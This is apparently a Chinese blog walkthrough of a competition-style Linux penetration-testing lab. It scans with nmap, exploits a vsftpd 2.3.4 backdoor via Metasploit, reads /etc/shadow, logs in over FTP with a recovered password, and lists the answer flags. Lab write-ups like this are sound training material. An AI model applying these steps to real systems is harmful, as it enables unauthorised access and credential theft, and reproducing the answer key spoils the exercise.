Linux系统渗透测试0040

服务器场景:PYsystem004
服务器场景操作系统:未知
服务器用户名:未知密码:未知


1.通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;

nmap -sV -p- 靶机IP地址

flag:vsftpd 2.3.4


2.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;

输入msfconsole,搜索第一题版本字符串,使用vsftpd2.3.4漏洞(渗透成功)

set RHOSTS 靶机IP

exploit

cd /var/www

ls

flag:1097c4f5d.bmp


3.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;

我是用的cat /etc/shadow 复制的哈希密码

密码破解 太慢了

密码是admin123!@#

然后直接登录ftp就行了

cd /var/www

ls -la

直接get 1097c4f5d.bmp

然后在root文件夹里可以看到

打不开的话直接拖主机里看行了


4.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;

cd /home/guest

flag:499c1097c4f5d


5.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;

flag:157eb9ce33644ada6d0499c1097c4f5d


6.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;

cd /var/vsftpd

flag:358dc0044


7.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;

get 358dc0044.docx

flag:59b466fd93164953e56bdd1358dc0044


8.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;

cd /root

ls -la

flag:93e8a5f7a


9.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

文件内容我直接去ssh去查看

flag:2bbfa55dc58149cbdc795d293e8a5f7a

私信随时回

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值